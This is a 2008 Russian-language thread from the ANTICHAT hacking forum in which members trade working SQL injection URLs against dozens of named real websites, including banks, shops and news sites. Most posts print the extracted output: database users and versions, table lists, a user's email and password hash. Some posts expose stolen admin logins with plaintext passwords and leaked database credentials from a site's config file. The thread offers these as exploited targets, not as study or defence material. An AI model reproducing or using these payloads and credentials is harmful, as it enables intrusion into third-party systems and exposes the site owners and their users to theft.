HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.07.2008, 14:10
vp$
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040

Репутация: 177
Отправить сообщение для vp$ с помощью ICQ
По умолчанию

== Анализ Сайта kreit.ru ==
Яндекс: тИЦ - 110, Страниц - 313
Google: PR - 2
ЯК: Есть;
=====================================

Цитата:
http://kreit.ru/templates/allnews.php?pid=999999999+union+select+1,concat_ws (0x3a3a,user(),version(),database()),3/*
kreit@jet.mplik.ru::5.0.41-log::kreit
Цитата:
17:extradata
18:ipublisher_email
19:ipublisher_faq
20:ipublisher_faq_lines
21:ipublisher_files
22:ipublisher_materials
23:ipublisher_materials_types
24:ipublisher_modules
25:ipublisher_news
26:ipublisher_news_lines
27:ipublisher_publishes
28:ipublisher_publishes_links
29:ipublisher_tekon17
30:ipublisher_tekon19
31:ipublisher_templates
32:ipublisher_textdocuments
33:ipublisher_vars
34:itaf_forum
35:itaf_group
36:itaf_message
37:itaf_mod
38:itaf_subscribe
39:itaf_thread
40:itaf_user
41:itaf_whois
42rder_all
Цитата:
http://kreit.ru/templates/allnews.php?pid=999999999+union+select+1,concat_ws (0x3a,user_name,user_pass,user_mail,user_icq),3+fr om+itaf_user+limit+0,1/*
merlin_sw:2e782c85379a326e:merlin_sw@mail.ru:
135 записей, типа хэша Mysql5
 
Ответить с цитированием

  #2  
Старый 07.07.2008, 14:31
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию

Код:
http://www.dpmhi.com/news.php?id=-1+union+select+all+1,2,concat_ws(0x3a,version(),user(),database()),4,5--
Код:
http://www.worldwidehealthcenter.net/category.php?prod=-1+union+select+all+1,2,3,4,5,6,7,8,9,10,11,darkc0de,13,14,15,16,17,18
Код:
http://www.jleen.com/page.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user(),database()),3--
Код:
http://www.calbank.net/newsite/products&services/index.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9--

Код:
http://firstfreedombank.com/PRstory.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user(),database()),3,4,5--

Код:
http://www.atbskimmers.com/product.php?id=-1+union+select+all+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26--

Код:
http://www.pokerdvd.net/product.php?id=-1+union+select+all+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15--
Код:
http://www.asynt.com/product_ranges_view.php?ID=-1+union+select+all+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9--
Код:
http://www.mofsupply.com/productDetail.php?id=-1+union+select+all+1,2,3,darkc0de,5,6,7,8,9,10,11,12,13,14,15,16,17

Код:
http://www.texasalliance.org/houstonwildcatters.php?id=-1+union+select+all+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13--
Код:
http://www.icd-usa.com/news1.php?id=-8+UNION+ALL+SELECT+1,2,@@version,4,5,6,7,8,9,10,11--
http://www.cnet.org.uk/news1.php?ID=-60+UNION+ALL+SELECT+1,@@version,3,4--
http://www.corporatedevelopmint.com/news1.php?ID=-152+UNION+ALL+SELECT+1,2,3,@@version,5,6,7,8,9,10,11,12,13,14--
http://effluxtechnologies.com/news1.php?ID=-8+UNION+ALL+SELECT+1,@@version,3,4,5--
http://www.michaelpollan.com/article.php?id=-87+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9,10--
http://www.virtuosimedia.com/resource.php?id=0&cat=-1+UNION+ALL+SELECT+1,@@version,3,4--
http://www.guerrillanews.com/articles/article.php?id=-717+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,@@version,12,13,14,15,16,17,18,19,20,21,22,23--
http://www.etleboro.com/read.php?id=-396+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9--
http://www.syroil.com/news1.php?id=-8+UNION+ALL+SELECT+1,2,@@version--
http://www.lavocedellevoci.it/news1.php?id=-80+UNION+ALL+SELECT+1,2,3,4,@@version,6--
http://www.lavocedellevoci.it/grandifirme1.php?id=-20+UNION+ALL+SELECT+1,2,@@version,4,5--
http://www.allfungames.com/games.php?id=-8+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9,10,11,12,13--
http://www.warnickart.com/posters/art.php?id=-78+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8,9,10,11,12,13--
http://www.neltnercreative.com/advertising/art.php?id=-57+UNION+ALL+SELECT+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
http://www.purdes.com/blog/art.php?id=-164+UNION+ALL+SELECT+1,@@version,3,4,5,6,7,8--

Последний раз редактировалось Constantine; 07.07.2008 в 19:53..
 
Ответить с цитированием

  #3  
Старый 07.07.2008, 19:51
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Антибоян обновлен, не забываем проверять свои инжекты.
Так же обращаю внимание на то что я перенес лист на другой хостинг;
http://constant1ne.by.ru/sqls.html - корневой пост отредактирован
Отдельное спасибо юзерам z01b и gisTy за помощь
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #4  
Старый 07.07.2008, 21:10
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462

Репутация: 91
Отправить сообщение для SUBJECT617 с помощью ICQ
По умолчанию

PR 3
Цитата:
http://www.menunsk.ru/places.php?id=0)+union+select+table_name,2+from+in formation_schema.tables/*
 
Ответить с цитированием

  #5  
Старый 07.07.2008, 22:10
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.business.su/kat.php?goroda=-104+union+select+concat_ws(0x3a,version(),user(),d atabase())/*

Version:4.0.27-standard
User:business_locuser@localhost
Database:business_mbase


таблички к сожалению не подобрал

2 gangs сюда постим только раскрученные скули...
 
Ответить с цитированием

  #6  
Старый 07.07.2008, 22:22
-Hormold-
Постоянный
Регистрация: 29.09.2007
Сообщений: 617
Провел на форуме:
3250478

Репутация: 999


Отправить сообщение для -Hormold- с помощью ICQ
По умолчанию

Может боян...
http://www.volnorez.ru/news_comments.php?news_id=-75+union+select+1,2,3,4,user(),5,6/*
http://www.geninform.ru/index.php?category_id=-75+union+select+user()/*
 
Ответить с цитированием

  #7  
Старый 08.07.2008, 01:54
DDoSька
Постоянный
Регистрация: 05.05.2008
Сообщений: 403
Провел на форуме:
2375039

Репутация: 1160
Отправить сообщение для DDoSька с помощью ICQ
По умолчанию

http://www.volnorez.ru/news_comments.php?news_id=-75+union+select+1,2,3,4,5,6,table_name+from+inform ation_schema.tables+limit+25,1/*
Тут много чего мона наделать =))
---------------------------------------------
www.volnorez.ru/forum/admin/index.php
админ: egor
пасс : 32167q

Последний раз редактировалось DDoSька; 08.07.2008 в 03:16..
 
Ответить с цитированием

  #8  
Старый 08.07.2008, 04:48
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Код:
http://www.basketshop.ru/showitem.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,login,pass),18,19,20,21,22,23,24,25+from+gbusers+limit+0,1/*
version() 4.1.22
user() basketsh@localhost
database() wwwbasketshopru
 
Ответить с цитированием

  #9  
Старый 08.07.2008, 04:33
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

DDoSька, -Hormold-
Цитата:
<?php
define('DB_SERVER', 'u24244.mysql.masterhost.ru');
define('DB_SERVER_USERNAME', 'u24244');
define('DB_SERVER_PASSWORD', 'symentico3go');
define('DB_DATABASE', 'u24244');
/forum/images/vital.php

Последний раз редактировалось sabe; 08.07.2008 в 04:41..
 
Ответить с цитированием

  #10  
Старый 08.07.2008, 06:33
slider
Members of Antichat - Level 5
Регистрация: 04.09.2005
Сообщений: 528
Провел на форуме:
6520559

Репутация: 2947


По умолчанию

www.valvoline.kz

Цитата:
http://www.valvoline.kz/index.php?news&news=9+order+by+6
и так ... колонок 6 ...

Цитата:
http://www.valvoline.kz/index.php?news&news=-9+union+select+1,version(),3,4,5,6/*
Ver : 5.0.26

Перегребаем информейшн_табля и находим только одну интересную таблицу... admin в бд valvoline

Цитата:
http://www.valvoline.kz/index.php?news&news=-9+union+select+1,concat(login,char(58),password),3 ,4,5,6+from+valvoline.admin/*
login: admin
pass: library

.....

Админка:

_http://www.valvoline.kz/admin.php
_http://www.valtec.kz/admin.php
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ